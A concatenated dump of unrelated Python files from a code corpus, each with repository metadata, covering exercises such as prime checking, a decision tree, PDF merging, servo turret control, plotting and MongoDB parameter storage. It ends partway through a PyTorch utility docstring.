1e3ace6133b9fef48189dda47c73d3b2db8d0628 | Python | ministat/spark-metrics | /monitor-by-metrics/spark/param.py | UTF-8 | 325 | 2.609375 | 3 | [] | no_license | class Param(object):
def __init__(self, args=None):
if args != None:
for k, v in args.__dict__.items():
self.__dict__[k] = v
def __getattr__(self, name):
return self.__dict__[name]
    def __setattr__(self, name, value):
        # Store attributes directly in the instance dict (matches the default
        # object behaviour; kept explicit to mirror __getattr__).
        self.__dict__[name] = value
| true |
a1a90a6702eee2c3a63e4cf17d996c512e4e6360 | Python | Yessinia-199/Tarea-Python-1 | /Módulo 2/src/primos.py | UTF-8 | 546 | 3.859375 | 4 | [] | no_license | #importacion de librerias
#constantes
#funciones y metodos
def es_primo(numero):
    """Return True when ``numero`` is a prime number.

    Bug fix: values below 2 (0, 1 and negatives) are now rejected; in the
    original their loop body never executed, so they were reported prime.
    """
    if numero < 2:
        return False
    # Trial division only up to sqrt(numero): any factor above the square
    # root would pair with one below it.
    divisor = 2
    while divisor * divisor <= numero:
        if numero % divisor == 0:
            return False
        divisor += 1
    return True
# main program
if __name__ == "__main__":
    # read the number from the keyboard
    numero= int(input("ingrese un numero"))
    # print according to the primality check
    if es_primo(numero):
        print(f"el numero: {numero} es primo")
    else:
        print(f"el numero: {numero} NO es primo")
5c769381ef92a18e0c862b52071c9c3c20af0cbb | Python | KleinTong/Daily-Coding-Problem-Solution | /cousins_of_node/main.py | UTF-8 | 1,213 | 3.5 | 4 | [] | no_license | from binary_tree import BTree
from node import Node
def find_cousins(root, node):
    """Collect every node at the same depth as ``node`` in the tree.

    NOTE(review): the result includes ``node`` itself and its siblings, so
    "cousins" here really means "all nodes on the same level" -- confirm
    against the intended definition.  Also relies on Node equality
    (``item == node``); whether that is identity or value equality depends
    on the Node class -- TODO confirm.
    """
    def get_level(root, node):
        # Depth of `node` with the root at level 1; -1 when absent.
        def worker(item, level_cnt):
            if item == node:
                return level_cnt
            if not item:
                return -1
            return max(worker(item.left, level_cnt + 1), worker(item.right, level_cnt + 1))
        return worker(root, 1)

    def helper(item, current_level, target_level):
        # Gather every node sitting exactly at target_level.
        if not item:
            return []
        if current_level == target_level:
            return [item]
        elif current_level > target_level:
            return []
        return helper(item.left, current_level + 1, target_level) + \
            helper(item.right, current_level + 1, target_level)

    node_level = get_level(root, node)
    return helper(root, 1, node_level)
if __name__ == '__main__':
    # Build a small tree (placement is decided by BTree.insert, whose
    # semantics are defined elsewhere) and list node_5's level-mates.
    tree = BTree()
    node_1 = Node(50)
    node_2 = Node(130)
    node_3 = Node(40)
    node_4 = Node(152)
    node_5 = Node(102)
    tree.insert(node_1)
    tree.insert(node_2)
    tree.insert(node_3)
    tree.insert(node_4)
    tree.insert(node_5)
    cousins = find_cousins(tree.root, node_5)
    for cousin in cousins:
        print(cousin)
| true |
512c38a5db0a920d88149bf8b7cdc317023e1444 | Python | hparekh62/pythonCourses | /INF308test1question1_new.py | UTF-8 | 459 | 3.96875 | 4 | [] | no_license | # Question 1
import random

# Draw random ints in [11, 444] until 44 appears, recording every draw.
numList = []
randNum = 0
while randNum != 44:
    randNum = random.randint(11, 444)
    numList.append(randNum)
count = len(numList)
numList.sort()
print("Largest number generated:", numList[-1])  # sorted, so the max is last
print("Number of iterations:", count)
# When ran three times, the largest numbers were: 444, 443, 441
# When ran three times, the number of iterations were: 287, 397, 356
| true |
0e8b2b62f4e8efcc1376c18960e00435c2834ff2 | Python | alexander-mcdowell/Algorithms | /python/DecisionTree.py | UTF-8 | 7,612 | 3.8125 | 4 | [] | no_license | import math
import random
from scipy.stats import chi2
# Decision Tree: A simple yet effective method of machine learning that is easy for humans to interpret and is accurate for simple tasks.
# This specific decion tree implements multivalued attributes and classes, k-fold cross-validation, and chi-square pruning.
# k-fold cross-validation is a good way of getting an accurate model that should not overfit as easily, however, larger k values mean longer training.
# k-fold cross-validation:
# 1. Shuffle and divide the data (training and testing) into k equal partitions.
# For example, if the data was [1, 2, 3, 4, 5, 6] and k = 3, the partitions could be [1, 3], [2, 6], [4, 5]
# 2. For each model tested, set aside (k - 1) of the partitions for training and 1 of the paritions for testing.
# In the example above, Model #n might receive [1, 3] and [2, 6] as training and be tested on [4, 5].
# 3. Choose the model that minimizes loss/cost values.
# Chi-square pruning:
# 1. As with all chi-square tests, a null hypothesis (assumption that there is no correlation) is required.
# 2. Assume the null hypothesis has a probability of occuring of p. This is also known as the confidence interval.
# 3. Calculate the total deviation from expectation created by adopting a target attribute.
# 4. If total deviation > chi square statistic: do not choose this attribute.
# Method:
# 1. Initialize an empty decision tree.
# 2. Choose the attribute that has the greatest information gain.
# 3. Split the examples based on that attribute. Add the attribute to the tree.
# 4. Repeat 2-3 recursively for each set of split examples.
# The entropy (uncertainty) of a random variable that can fall into one of many attributes according to probs.
def entropy(probs):
    """Shannon entropy (in bits) of the discrete distribution ``probs``.

    Outcomes with p == 0 are skipped (lim p->0 of -p*log2(p) is 0) and
    certain outcomes (p == 1) contribute nothing, matching the original's
    exclusions.  Uses math.log2 instead of log(p)/log(2).
    """
    return -sum(p * math.log2(p) for p in probs if 0 < p < 1)
# The information gain of a target attribute is the change in entropy from adding a target attribute to the decision tree.
def information_gain(target_attribute, examples, attributes, classes, confidence = 0.05):
    """Information gain of splitting ``examples`` on ``target_attribute``,
    with chi-square pruning: returns 0 when the split's deviation from the
    expected class distribution exceeds the chi-square statistic."""
    # Find the entropy of the parent set by noting the frequency of each classification and then dividing by the size of the parent set
    class_counts = {c: 0 for c in classes}
    for example in examples: class_counts[example[-1]] += 1
    information_gain = entropy([class_counts[x]/len(examples) for x in class_counts])
    # Find the entropy of splitting the parent set by a certain attribute.
    # Entropy is calculated by summing over the entropies for each possible value of the attribute times the probability that it occurs in the parent set.
    attribute_entropy = 0
    total_deviation = 0
    # There are len(examples) - 1 degrees of freedom.
    # NOTE(review): a standard chi-square independence test would use
    # (values - 1) * (classes - 1) degrees of freedom -- confirm intended.
    chisquare_statistic = chi2.isf(confidence, len(examples) - 1)
    for a in attributes[target_attribute]:
        examples_subset = [e for e in examples if e[target_attribute] == a]
        if len(examples_subset) != 0:
            attribute_class_counts = {c: 0 for c in classes}
            for example in examples_subset: attribute_class_counts[example[-1]] += 1
            # Determine the deviation from expectation.
            observed = [attribute_class_counts[x] for x in attribute_class_counts]
            expected = [class_counts[x] * len(examples_subset) / len(examples) for x in attribute_class_counts]
            deviations = [(observed[i] - expected[i]) ** 2 / expected[i] for i in range(len(observed))]
            total_deviation += sum(deviations)
            attribute_entropy += entropy([attribute_class_counts[x]/len(examples_subset) for x in attribute_class_counts]) * len(examples_subset)/len(examples)
    # Prune: a statistically insignificant split gains nothing.
    if total_deviation > chisquare_statistic: return 0
    information_gain -= attribute_entropy
    return information_gain
def DecisionTree(examples, attributes, classes, attribute_names, tree=None, path=None):
    """Recursively build a decision tree by greedy information gain.

    Returns a list of paths; each path is a list of [attribute, value]
    pairs terminated by the predicted class.

    Fix: the original declared ``path=[]`` -- a mutable default argument
    shared across top-level calls; both accumulators now default to None
    and get fresh lists per call.
    """
    if tree is None:
        tree = []
    if path is None:
        path = []
    class_counts = {c: 0 for c in classes}
    for example in examples:
        class_counts[example[-1]] += 1
    # Pure leaf: exactly one class holds all the examples -> record the path.
    if sorted(set(class_counts.values())) == [0, len(examples)]:
        tree.append(path + [examples[0][-1]])
        return None
    if len(examples) == 1:
        return None
    # Greedy choice: split on the attribute with the highest gain.
    information_gains = [information_gain(a, examples, attributes, classes) for a in attributes]
    best_attribute = list(attributes)[information_gains.index(max(information_gains))]
    new_attributes = attributes.copy()
    del new_attributes[best_attribute]
    for k in attributes[best_attribute]:
        examples_subset = [e for e in examples if e[best_attribute] == k]
        DecisionTree(examples_subset, new_attributes, classes, attribute_names, tree, path + [[best_attribute, k]])
    return tree
def predict(tree, unclassified_data):
    """Return the class of the first tree path whose criteria all match
    ``unclassified_data``, or None when no path (or no tree) matches."""
    if tree is None:
        return None
    for *criteria, decision in tree:
        if all(unclassified_data[attr] == expected for attr, expected in criteria):
            return decision
    return None
def accuracy(tree, target_data):
    """Fraction of rows in ``target_data`` whose predicted class matches
    the actual label stored in the row's last column."""
    hits = sum(1 for row in target_data if predict(tree, row) == row[-1])
    return hits / len(target_data)
def kfold_partition(data, k):
    """Shuffle a copy of ``data`` and split it into a (k-1)/k training
    slice and a 1/k validation slice; k == 1 keeps everything for training."""
    if k == 1:
        return data, []
    shuffled = list(data)
    random.shuffle(shuffled)
    cut = (k - 1) * (len(data) // k)
    return shuffled[:cut], shuffled[cut:]
# All values except the last are attributes, the last is the class value
data = [[0, 0, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[1, 0, 1, 0, 1],
[1, 1, 0, 0, 1],
[1, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[1, 0, 0, 1, 0],
[1, 0, 1, 1, 0],
[0, 0, 1, 1, 0],
[1, 1, 0, 1, 0],
[1, 1, 1, 0, 1],
[0, 1, 0, 1, 0],
[0, 1, 1, 0, 0],
[1, 1, 1, 1, 0]]
attributes = {0: [0, 1],
1: [0, 1],
2: [0, 1],
3: [0, 1]}
attribute_names = ["a", "b", "c", "d"]
classes = [0, 1]
# Training: k-fold cross-validation with k = 5
# Try several k values over a couple of shuffles, keeping every tree that
# ties or beats the best validation accuracy seen so far.
best_accuracy = 0
k_max = 5
iterations = 2
best_trees = {}
for iteration in range(iterations):
    for k in range(2, k_max + 1):
        train_data, valid_data = kfold_partition(data, k)
        tree = DecisionTree(train_data, attributes, classes, attribute_names)
        acc = accuracy(tree, valid_data)
        if acc >= best_accuracy:
            best_accuracy = acc
            if acc not in best_trees: best_trees[acc] = []
            best_trees[acc].append(tree)

# Occam's Razor: The hypothesis (in our case model) which makes the least assumptions (in our case, requires the least criteria) is likely the best hypothesis.
# Among the most accurate trees, pick the one with the fewest paths.
best_tree = None
min_tree_length = 1e6
for tree in best_trees[max(best_trees)]:
    if len(tree) < min_tree_length:
        best_tree = tree
        min_tree_length = len(tree)

# Print results: one human-readable "If ... then ..." rule per tree path.
print("Decision tree that fits the training data: ")
print("-" * 25)
for possibility in best_tree:
    decision = possibility[-1]
    criteria = possibility[:-1]
    # NOTE(review): criteria_met is never used in this loop -- leftover?
    criteria_met = 0
    s = "If "
    for property in criteria: s += attribute_names[property[0]] + " = " + str(property[1]) + ", "
    print(s + "then the data belongs to class " + str(classes[decision]))
print("-" * 25)
print("The accuracy of the decision tree is %.2f%% during validation." % (100 * best_accuracy))
7d34888c568246ed2fadd98a2a42deb33071ec39 | Python | XiplusChenyu/AI-Customer-Service | /DATA_DEALER/mark_recommendation.py | UTF-8 | 1,246 | 3.265625 | 3 | [] | no_license | import csv
from scraper import CSV_PATH
"""
Guide:
I choose the top 100 restaurant with:
lowest reviews counts and rate < 4.0 as not recommended
I choose the top 100 restaurant with:
highest reviews counts and rate > 4.0 as recommended
"""
with open(CSV_PATH, 'r') as csv_file:
    reader = csv.reader(csv_file)
    fieldnames = next(reader)  # move the cursor past the header row
    reader = csv.DictReader(csv_file, fieldnames=fieldnames)
    rows = [row for row in reader]

# Ascending review count: the least-reviewed restaurants come first.
rows.sort(key=lambda row: int(row['review_count']))
count_good = 0
count_bad = 0
# Mark the 100 least-reviewed restaurants rated below 4 as "not recommended".
for row in rows:
    if float(row['rate']) < 4:
        row['recommended'] = 0
        count_bad += 1
        if count_bad == 100:
            break
else:
    print('NOT THAT MANY BAD CANDIDATES')
rows.reverse()
# Mark the 100 most-reviewed restaurants rated above 4 as "recommended".
for row in rows:
    if float(row['rate']) > 4:
        row['recommended'] = 1
        count_good += 1
        if count_good == 100:
            break
else:
    print('NOT THAT MANY GOOD CANDIDATES')

R_CSV_PATH = './data/data_marked.csv'
# BUG FIX: marked rows carry an extra 'recommended' key that was not in the
# writer's fieldnames, so DictWriter (extrasaction='raise' by default) blew
# up on the first marked row.  restval='' keeps unmarked rows valid, and
# newline='' prevents blank lines on Windows.
with open(R_CSV_PATH, 'w', newline='') as out_file:
    writer = csv.DictWriter(out_file, fieldnames=fieldnames + ['recommended'], restval='')
    writer.writeheader()
    for row in rows:
        writer.writerow(row)
| true |
25b4078f4dbdc8c07ce1fcc5fe9c21f1223ed6b4 | Python | dansjack/HackerEarth | /hackerEarth-py/basic_programming/complexity_analysis.py | UTF-8 | 845 | 4.1875 | 4 | [] | no_license | def sum_ab(a, b):
return int(a) + int(b)
def sum_ab_loop():
while True:
try:
a, b = input().split()
sum_ab(int(a), int(b))
except EOFError:
break
def vowel_recognition(s):
"""
Returns the number of vowels from every
possible substring in string s
:param s: string to analyze
"""
s = s.lower()
vowels = 0
size = len(s)
for i in range(size):
if s[i] in 'aeiou':
# if el is a vowel, count all the sub strings including el
# to the left (i + 1) and right (size - 1) and multiply
vowels += ((i + 1) * (size - i))
print(vowels)
return vowels
def vowel_rec_loop():
loops = int(input())
while loops > 0:
vowel_recognition(input())
loops -= 1
vowel_recognition('baceb') | true |
ba7b151e4544a7710b06dde331e929a26c40212b | Python | BerZerKku/PYTHON_PDF | /src/PDFmerge.py | UTF-8 | 5,204 | 2.71875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from argparse import ArgumentParser
from glob import glob
from pyPdf import PdfFileReader, PdfFileWriter
import sys, os, locale
FIND = [u"(СБ)", u"(СП)", u"(Э3)"] # признак поиска
MANUFACTURE = [u"(СБ)", u"(СП)"] # для Боковой не надо Э3
DEFAULT_NAME = "merged" # название файла по умолчанию
##
def crtOutputName(name, find):
    ''' (unicode, list of unicode) -> (unicode)

    Return the output file name.

    If \a name is the default name, the current directory is searched for
    pdf files whose names contain one of the markers in \a find; the name
    is built from the part of the last such file preceding the marker.
    Otherwise the given \a name is returned (with any ".pdf" tail cut off).
    Trailing spaces are stripped in both cases.
    '''
    if name == DEFAULT_NAME:
        for pdffile in glob(u'*.pdf'):
            for f in find:
                # search the pdf files for a name containing at least one
                # of the marker strings from `find`
                pos = pdffile.find(f)
                if pos >= 0:
                    # keep only the part of the file name that precedes
                    # the marker; trailing spaces are removed below
                    name = pdffile[:pos]
    else:
        pos = name.find(".pdf")
        if pos >= 0:
            name = name[:pos]
    return name.rstrip()
##
def crtFullDocument(path, output_filename, find):
    ''' (unicode, unicode, list of unicode) -> None

    Merge all documentation files into a single pdf.
    '''
    output_filename = unicode(output_filename)
    input_files = []
    files = glob(u'*.pdf')
    # Build the list of candidate file names and keep the ones actually
    # present in the current directory.
    for f in [u"%s %s.pdf" % (output_filename, x) for x in find]:
        if f in files:
            input_files.append(f)
    merge(path, u"%s.pdf" % (output_filename), input_files)
##
def crtSeparateDocuments(path, output_filename, find):
    ''' (unicode, unicode, list of unicode) -> None

    Build one merged pdf per documentation kind in ``find``.
    '''
    output_filename = unicode(output_filename)
    files = glob(u'*.pdf')
    # For each kind, build a name mask, collect all matching files from the
    # current directory and merge them into one output file.
    for doc in find:
        input_files = []
        input_mask = u"%s %s " % (output_filename, doc)
        print(input_mask)
        output_file = u"%s %s.pdf" % (output_filename, doc)
        for f in files:
            if input_mask in f:
                input_files.append(f)
        merge(path, output_file, input_files)
##
def merge(path, output_filename, input_files):
    ''' (unicode, unicode, list of unicode) -> None
    Merge *.pdf files: copy every page of each file in *input_files*
    into one output file named *output_filename*.

    NOTE(review): *path* is accepted but unused -- files are opened
    relative to the current working directory.
    '''
    output = PdfFileWriter()
    output_filename = unicode(output_filename)
    cnt_pdf_file = 0   # number of processed input files
    open_streams = []  # inputs must stay open until output.write() finishes (lazy page reads)
    for f in input_files:
        cnt_pdf_file += 1
        # fix: use open() -- the file() builtin is Python-2 only
        stream = open(f, 'rb')
        open_streams.append(stream)
        document = PdfFileReader(stream)
        for i in range(document.getNumPages()):
            output.addPage(document.getPage(i))
        print(u"Обработан файл '%s'." % f)
    if cnt_pdf_file == 0:
        print(u"В текущем каталоге небыло найдено подходящих pdf файлов.")
    else:
        output_stream = None
        try:
            print(u"Сохранение в '%s'." % output_filename)
            output_stream = open(output_filename, "wb")
        except IOError:
            print(u"Ошибка записи!")
            print(u"Попытка сохранения в %s.pdf" % DEFAULT_NAME)
            try:
                output_stream = open(DEFAULT_NAME + '.pdf', "wb")
            except IOError:  # fix: was a bare except, which also swallowed KeyboardInterrupt
                print(u"Ошибка записи!")
        if output_stream is not None:
            output.write(output_stream)
            output_stream.close()
    # fix: input file handles were previously never closed (resource leak)
    for stream in open_streams:
        stream.close()
##
if __name__ == "__main__":
    parser = ArgumentParser()
    # Add more options if you like
    parser.add_argument("-o", "--output", dest="output_filename",
                        default=DEFAULT_NAME,
                        help=u"write merged PDF to FILE", metavar="FILE")
    parser.add_argument("-p", "--path", dest="path", default=".",
                        help=u"path of source PDF files")
    parser.add_argument("-s", "--separate", help=u"create separate documents",
                        action="store_true")
    parser.add_argument("-f", "--full", help=u"create full document",
                        action="store_true")
    args = parser.parse_args()
    # NOTE(review): the -s/-f flags are parsed but currently ignored --
    # both document kinds are always produced (see commented check below).
    separate = args.separate
    tmp = unicode(args.output_filename, locale.getpreferredencoding())
    outputname = crtOutputName(tmp, FIND)
    crtSeparateDocuments(args.path, outputname, FIND)
    # if args.full:
    crtFullDocument(args.path, outputname, MANUFACTURE)
    k = raw_input()  # wait for input so the console window does not close by itself
| true |
83458cca82f945ccdbb39fe9ad23ca72153f5f44 | Python | Ereaey/Linux_Projet | /beaglebone/logiciel_beaglebone/servo_dbus/turret.py | UTF-8 | 1,592 | 2.78125 | 3 | [] | no_license | from servo import *
from shape import *
from led import *
import pwm
import json
class Turret:
    """Pan/tilt turret with a laser pointer, driven by two servos.

    Servo channels and LED pins are read from the on-device JSON
    configuration file at construction time.
    """

    def __init__(self):
        pwm.enablePWM()
        config_file = open('/home/debian/logiciel_beaglebone/servo_dbus/configuration.json')
        config = json.load(config_file)
        config_file.close()
        settings = config["configuration"]
        self.servoHorizontal = Servo(settings["servoHorizontal"])
        self.servoVertical = Servo(settings["servoVertical"])
        self.laser = Led(int(settings["laser"]))  # P8_14
        self.modeShape = Led(int(settings["ledmode"]))
        self.shape = Shape(self)

    def setAngle(self, angleVertical, angleHorizontal):
        """Move both axes to absolute angles (vertical first)."""
        self.servoVertical.setAngle(angleVertical)
        self.servoHorizontal.setAngle(angleHorizontal)

    def setAngleHorizontal(self, angleHorizontal):
        """Move the horizontal axis to an absolute angle."""
        self.servoHorizontal.setAngle(angleHorizontal)

    def setAngleVertical(self, angleVertical):
        """Move the vertical axis to an absolute angle."""
        self.servoVertical.setAngle(angleVertical)

    def addAngleVertical(self, angleVertical):
        """Move the vertical axis by a relative offset."""
        target = angleVertical + self.servoVertical.getAngle()
        self.servoVertical.setAngle(target)

    def addAngleHorizontal(self, angleHorizontal):
        """Move the horizontal axis by a relative offset."""
        target = angleHorizontal + self.servoHorizontal.getAngle()
        self.servoHorizontal.setAngle(target)

    def draw(self, forme):
        """Trace the named shape with the laser; the mode LED is lit meanwhile."""
        self.modeShape.turnOn()
        self.shape.drawShape(forme)
        self.modeShape.turnOff()

    def turnOnLaser(self):
        self.laser.turnOn()

    def turnOffLaser(self):
        self.laser.turnOff()
#t = Turret()
#t.draw("square")
| true |
9e4e8e75f63bc92bb1d975a25c3f5a31766a512e | Python | ejseal21/Computational-Neuroscience | /Project4/net_plots.py | UTF-8 | 7,441 | 3.59375 | 4 | [] | no_license | '''net_plots.py
Plots for visualization neural network activity
CS 443: Computational Neuroscience
Alice Cole Ethan
Project 4: Motion estimation
'''
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import display, clear_output
def plot_act_image_single(act, pause=0.001, cmap='bone'):
    '''Animate a stack of 2D activation maps in a single, repeatedly
    updated image plot (a simple "video" of the activity).

    Parameters:
    -----------
    act: ndarray. shape=(n_frames, height, width) or (height, width).
        Activation values over time; a single 2D map is treated as one frame.
    pause: float.
        Delay between successive frames (controls the frame rate).
    cmap: str.
        Matplotlib colormap; 'bone' maps 0 to black and 1 to white.
    '''
    # promote a single 2D map to a one-frame stack
    if len(act.shape) == 2:
        act = np.expand_dims(act, 0)
    fig = plt.figure()
    ax = fig.add_subplot(1, 1, 1)
    for frame_idx in range(act.shape[0]):
        plt.imshow(act[frame_idx], cmap=cmap)
        clear_output(wait=True)
        plt.pause(pause)
def plot_act_image_grid(act, n_rows=2, n_cols=4, pause=0.001, cmap='bone', figSz=(18, 9)):
    '''Animated grid of plots (typically 2x4 for 8 directions in 45 deg
    increments), one panel per direction channel.

    Parameters:
    -----------
    act: ndarray. shape=(n_frames, n_dirs, height, width) or (n_dirs, height, width).
        Activation values of spatial direction maps over time.
    n_rows, n_cols: int.
        Grid layout; n_rows * n_cols must equal n_dirs.
    pause: float.
        Delay between successive frames (controls the frame rate).
    cmap: str.
        Matplotlib colormap; 'bone' maps 0 to black and 1 to white.
    figSz: tuple of ints.
        (width, height) of the matplotlib figure.

    Raises:
    -------
    ValueError: if n_dirs does not match n_rows * n_cols.
    '''
    if len(act.shape) == 3:
        act = np.expand_dims(act, axis=0)
    n_frames, n_dirs, height, width = act.shape
    if n_dirs != n_cols * n_rows:
        # Fix: the docstring promises an error on mismatch; previously the
        # function only printed a message and silently returned None.
        raise ValueError("Mismatch of n_dirs and n_rows/n_cols")
    fig = plt.figure(figsize=figSz)
    for n in range(n_frames):
        fig.clf()  # clear the whole grid before drawing the next frame
        for d in range(n_dirs):
            ax = fig.add_subplot(n_rows, n_cols, d + 1)
            ax.imshow(act[n, d, :, :], cmap=cmap)
        display(fig)
        clear_output(wait=True)
        fig.tight_layout()
        plt.pause(pause)
def vector_sum_plot(act, figSz=(18, 9), pause=0.01):
    '''Visualize the combined activity of all direction cells as one vector
    per spatial position (the sum of the n_dirs direction vectors at each
    (x, y)), animated over time with quiver.

    Parameters:
    -----------
    act: ndarray. shape=(n_frames, n_dirs, height, width) or (n_dirs, height, width).
        Direction-cell activation maps over time.
    figSz: tuple of ints.
        (width, height) of the matplotlib figure.
    pause: float.
        Delay between successive frames (controls the frame rate).
    '''
    if len(act.shape) == 3:
        act = np.expand_dims(act, axis=0)
    n_frames, n_dirs, height, width = act.shape
    # Fix: replace the quadruple Python loop (O(frames*dirs*h*w) interpreted
    # iterations) with an equivalent vectorized contraction over the
    # direction axis: U = sum_m act[:, m] * cos(2*pi*m/n_dirs), same for V.
    angles = 2 * np.pi * np.arange(n_dirs) / n_dirs
    U = np.einsum('fdhw,d->fhw', act, np.cos(angles))
    V = np.einsum('fdhw,d->fhw', act, np.sin(angles))
    # global normalization by the max component; tiny epsilon (same value as
    # before) guards against division by zero when all activity is <= 0
    U = U / (np.max(U) + 1e-13)
    V = V / (np.max(V) + 1e-13)
    # (x, y) receptive-field coordinates for the quiver arrows
    X, Y = np.meshgrid(np.arange(width), np.arange(height), indexing='xy')
    fig = plt.figure(figsize=figSz)
    ax = fig.add_subplot(1, 1, 1)
    for n in range(n_frames):
        plt.quiver(X, Y, U[n], V[n])
        clear_output(wait=True)
        plt.pause(pause)
def vector_sum_plot_and_input(act, input, figSz=(18, 9), pause=0.01):
    '''Animate the per-pixel direction vector field overlaid on the
    (binarized, inverted) input stimulus.

    Parameters:
    -----------
    act: ndarray. shape=(n_frames, n_dirs, height, width) or (n_dirs, height, width).
        Direction-cell activation maps over time.
    input: ndarray.
        Stimulus frames; values < 1 are shown as 1, others as 0.
        NOTE: the parameter name shadows the builtin ``input``; kept for
        backward compatibility with existing callers.
    figSz: tuple of ints.
        (width, height) of the matplotlib figure.
    pause: float.
        Delay between successive frames (controls the frame rate).
    '''
    input = np.where(input < 1, 1, 0)
    if len(act.shape) == 3:
        act = np.expand_dims(act, axis=0)
    n_frames, n_dirs, height, width = act.shape
    # Fix: vectorized contraction over the direction axis replaces the
    # previous quadruple Python loop (identical math).
    angles = 2 * np.pi * np.arange(n_dirs) / n_dirs
    U = np.einsum('fdhw,d->fhw', act, np.cos(angles))
    V = np.einsum('fdhw,d->fhw', act, np.sin(angles))
    U = U / (np.max(U) + 1e-13)  # same epsilon as before, written readably
    V = V / (np.max(V) + 1e-13)
    X, Y = np.meshgrid(np.arange(width), np.arange(height), indexing='xy')
    fig = plt.figure(figsize=figSz)
    ax = fig.add_subplot(1, 1, 1)
    for n in range(n_frames):
        plt.quiver(X, Y, U[n], V[n])
        # assumes 5 network time steps per stimulus frame -- TODO confirm
        plt.imshow(input[int(n / 5)], cmap='bone')
        clear_output(wait=True)
        plt.pause(pause)
6d64467d1b1a80528707af7edd9ee5b136cc2e2b | Python | AdamZhouSE/pythonHomework | /Code/CodeRecords/2535/60773/292953.py | UTF-8 | 919 | 2.640625 | 3 | [] | no_license | s=input()
#print(s)
# strip the surrounding '[' and ']' of the printed-list style input
s=s[1:len(s)-1]
l=s.split(",")
for i in range(len(l)):
    l[i]=int(l[i])
list=[]  # NOTE(review): shadows the builtin `list`; only used by the dead code below
point=[]  # partition boundaries for the live algorithm below
sum=0  # NOTE(review): shadows the builtin `sum`
'''for i in range(len(l)):
    squart=[]
    n=l[i]
    for j in range(len(list)):
        m=max(list[j])
        if n<m:
            for k in range(j+1,len(list),1):
                list[j]=list[j]+list[k]
            sum=j
            break
    print(sum)
    print(list)
    list[sum].append(n)
    sum=sum+1
    print(sum)'''
# live attempt: greedily maintain `point` and count segments
sum=1
point.append(0)
for i in range(1,len(l),1):
    flag=0
    for j in range(len(point)):
        if j==len(point)-1:
            # last segment: from the last boundary up to the current element
            squart=l[point[len(point)-1]:i]
        else:
            squart=l[point[j]:point[j+1]]
        if l[i]<max(squart):
            # current element is smaller than some earlier segment max:
            # collapse all later boundaries into segment j
            flag=1
            point=point[:j+1]
            break
    if flag==0:
        sum=sum+1
        # NOTE(review): elsewhere `point` entries are used as slice *indices*,
        # but here the element *value* l[i] is appended -- looks like a bug;
        # confirm against the intended algorithm.
        point.append(l[i])
print(len(point))
| true |
5975fb60c979d86459a91f4c2e2b418b271f25c1 | Python | godjuansan/FakeNewsGenerator | /model/graphs_neuron_network.py | UTF-8 | 549 | 3.015625 | 3 | [] | no_license | import matplotlib.pyplot as plt
# graph of neural network model of both loss and accuracy
def graphs_nn(loss, val_loss, accuracy, val_accuracy):
    """Plot train-vs-test loss (figure 1) and accuracy (figure 2) per epoch.

    All four arguments are per-epoch sequences of equal length.
    """
    epochs = range(1, len(loss) + 1)
    panels = (
        (1, loss, val_loss, "Loss"),
        (2, accuracy, val_accuracy, "Accuracy"),
    )
    for fig_id, train_curve, test_curve, y_label in panels:
        plt.figure(fig_id)
        plt.plot(epochs, train_curve, label='train')
        plt.plot(epochs, test_curve, label='test')
        plt.ylabel(y_label)
        plt.xlabel("Epoch")
        plt.legend()
    plt.show()
ce7dbfdb9f2a9b71fc51a696436e3cddd3d857f4 | Python | ghanshyamdhiman/gsdflk | /include/filesstore.py | UTF-8 | 408 | 3.140625 | 3 | [] | no_license | from webscrapper import LyricsScrapper
# page to scrape; presumably get_lyrics() returns the page's text -- TODO confirm
the_url = "http://www.values.com/inspirational-quotes"
the_scrapper = LyricsScrapper(the_url)
the_lyrics_data = the_scrapper.get_lyrics()
def store_the_file(file_name, lyrics_data):
    """Append *lyrics_data* to the file *file_name* (created if missing).

    Fix: the previous try/finally called ``f.close()`` even when ``open``
    itself raised, producing a NameError that masked the real error; the
    ``with`` statement closes the handle only once it exists.
    """
    with open(file_name, "a") as f:
        f.write(lyrics_data)
# persist the scraped text (appends on repeated runs)
the_file_name = "test_file.txt"
store_the_file(the_file_name, the_lyrics_data)
| true |
cc8b69132186b3fc808a258e3dc727d3e64ffe65 | Python | TheBlusky/tromino | /src/models/parameter.py | UTF-8 | 1,295 | 2.578125 | 3 | [] | no_license | from exceptions import ParameterAlreadyExists
from models.database import Database
class ParameterModel:
    """Named key/value parameter persisted in the ``config`` collection."""

    @classmethod
    async def create(cls, param_name, value):
        """Insert a new parameter; raise ParameterAlreadyExists if the name is taken."""
        config = Database.get_collection("config")
        existing = await config.find_one({"param_name": param_name})
        if existing is not None:
            raise ParameterAlreadyExists()
        doc = {"param_name": param_name, "value": value}
        await config.insert_one(doc)
        return ParameterModel(doc)

    @classmethod
    async def retrieve(cls, param_name):
        """Return the stored parameter, or a falsy value when it does not exist."""
        config = Database.get_collection("config")
        doc = await config.find_one({"param_name": param_name})
        return ParameterModel(doc) if doc else doc

    def __init__(self, document):
        # document is the raw collection record
        self.param_name = document["param_name"]
        self.value = document["value"]

    async def change_value(self, new_value):
        """Persist *new_value* and mirror it on this instance."""
        config = Database.get_collection("config")
        await config.update_one(
            {"param_name": self.param_name}, {"$set": {"value": new_value}}
        )
        self.value = new_value

    @classmethod
    async def flush(cls):
        """Delete every stored parameter."""
        await Database.get_collection("config").delete_many({})
| true |
1afe372e4966458b39341c7bc353c346ae354e63 | Python | geekswaroop/pytorch_connectomics | /connectomics/model/utils/misc.py | UTF-8 | 10,484 | 2.734375 | 3 | [
"MIT"
] | permissive | from __future__ import print_function, division
from collections import OrderedDict
from typing import Optional, List
import torch
from torch import nn
import torch.nn.functional as F
from torch.jit.annotations import Dict
class IntermediateLayerGetter(nn.ModuleDict):
    """
    Module wrapper that returns intermediate layers from a model, adapted
    from https://github.com/pytorch/vision/blob/master/torchvision/models/_utils.py.

    It has a strong assumption that the modules have been registered
    into the model in the same order as they are used.
    This means that one should **not** reuse the same nn.Module
    twice in the forward if you want this to work.

    Additionally, it is only able to query submodules that are directly
    assigned to the model. So if `model` is passed, `model.feature1` can
    be returned, but not `model.feature1.layer2`.

    Arguments:
        model (nn.Module): model on which we will extract the features
        return_layers (Dict[name, new_name]): a dict containing the names
            of the modules for which the activations will be returned as
            the key of the dict, and the value of the dict is the name
            of the returned activation (which the user can specify).

    Examples::

        >>> m = torchvision.models.resnet18(pretrained=True)
